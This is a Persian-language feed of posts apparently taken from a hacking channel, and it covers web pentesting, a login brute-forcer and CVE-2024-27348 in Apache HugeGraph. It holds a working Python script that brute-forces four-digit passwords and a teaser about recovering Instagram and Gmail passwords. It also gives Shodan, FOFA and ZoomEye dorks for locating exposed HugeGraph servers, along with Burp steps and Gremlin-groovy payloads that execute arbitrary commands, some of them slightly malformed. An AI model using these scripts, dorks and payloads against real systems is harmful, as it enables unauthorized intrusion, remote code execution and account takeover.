🖱 🎩آموزش پروتکل HTTP برای تست نفوذ وب
🔤 #web
❕چکیده مطلب:
در این مقاله کامل با پروتکل HTTP برای تست نفوذ آشنا شوید. این آموزش مفاهیم مهمی مانند ارسال درخواست، کدهای وضعیت، کوکیها و هدرها را برای هکرهای مبتدی توضیح میدهد.💻
⌛ زمان مطالعه : 11 دقیقه
⬅️لینک آموزش➡️
Code Block
اگر به گیت هاب دستترسی ندارید به یک BruteForcer صفحه لاگین نیاز دارید میتونید از این قطعه کد کمک بگیرید:
import requests
url = "http://zerodey.ir/labs/lab1/index.php"
username = "admin"
# Generating 4-digit numeric passwords (0000-9999)
password_list = [str(i).zfill(4) for i in range(10000)]
def brute_force():
for password in password_list:
data = {"username": username, "password": password}
response = requests.post(url, data=data)
if "Invalid" not in response.text:
print(f"[+] Found valid credentials: {username}:{password}")
break
else:
print(f"[-] Attempted: {password}")
brute_force()
The Stranglersaudio-golden-brown-by-the-stranglers.mp3
زمان:
حجم:
4.5M
Good night everyone💤
2.4M حجم رسانه بالاست
مشاهده در ایتا
🔻🎥بازیابی رمز اینستاگرام و جیمیل در ۳۰ ثانیه!
🔓 CVE-2024-27348 — آسیبپذیری بحرانی RCE در Apache HugeGraph-Server 🔓
🟢 CVE-2024-27348 یک آسیبپذیری بسیار مهم و بحرانی (Critical) با امتیاز CVSS 9.8 در Apache HugeGraph-Server است که در نسخههای 1.0.0 تا قبل از 1.3.0 وجود دارد. این آسیبپذیری از نوع Remote Code Execution (اجرای کد از راه دور) بوده و به مهاجم اجازه میدهد بدون احراز هویت، دستورات دلخواه را روی سرور اجرایی کند.
https://nvd.nist.gov/vuln/detail/cve-2024-27348
📌 چه اتفاقی میافتد؟
آسیبپذیری در تعامل با Gremlin (زبان پرسوجوی گراف) یا بخشهای مدیریتی HugeGraph قرار دارد. مهاجم با ارسال ورودیهای خاص میتواند از ضعف کنترل دسترسی سوءاستفاده کند و کد دلخواهش را روی سرور اجرا نماید.
📍 پیامدها:
دسترسی کامل به سیستم
افشای دادههای حساس
نصب بدافزار یا ایجاد بکدور
مختل کردن سرویسها و حذف/تغییر دادهها
👾 shodan dork
1 http.title:"HugeGraph"
2 http.html:"HugeGraph Server"
3 product:"Apache HugeGraph"
4 port:8080 "HugeGraph"
👾 fofa dork
1 app="Apache-HugeGraph"
2 title="HugeGraph"
3 body="HugeGraph Server"
4 server="HugeGraph"
5 body="gremlin" && body="HugeGraph"
6 app="Apache-HugeGraph" && port="8080"
👾ZoomEye Dorks
1 app:"Apache HugeGraph"
2 service:"HugeGraph"
3 title:"HugeGraph"
exploit
http://target.com/gremlin
🧪 روش تست دستی با Burp Suite ( PoC)
1 رهگیری درخواست
Burp → Proxy → Intercept ON
وارد مسیر /gremlin درخاست رو از گت به پست تغیر میدیم
POST /gremlin HTTP/1.1
Host: target:8080
Content-Type: application/json
Content-Length: ...
{
"gremlin": f"def result = \"{ls}\".execute().text\njava.lang.reflect.Field field = Thread.currentThread().getClass().getDeclaredField(result);",
}
.....................
payload 1
{
"gremlin": f"Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"VICARIUS\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList({formatted_words});Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);",
"bindings": {},
"language": "gremlin-groovy",
"aliases": {}
}
payload 2
"gremlin": f"def result = \"{command}\".execute().text\njava.lang.reflect.Field field = Thread.currentThread().getClass().getDeclaredField(result);",
}
2
https://github.com/jakabakos/CVE-2024-27348-Apache-HugeGraph-RCE
3 https://github.com/kljunowsky/CVE-2024-27348/blob/main/CVE-2024-27348.py
لیستی از بهترین کتاب های Hکینگ دنیا که توسط افراد خیلی حرفه ای نوشته شدن
Code Block
میدونستید به جای نوشتن template های ناکلی با کمک هوش مصنوعی خودش میتونید ازش بخواید براتونtemplate بنویسه ؟
مثلا ما در تصویر بالا یک template که خودمون نوشته بودیم رو تست کردیم و یک دور هم با هوش مصنوعی(خودش) تست کردیم و جواب میده!
Code Block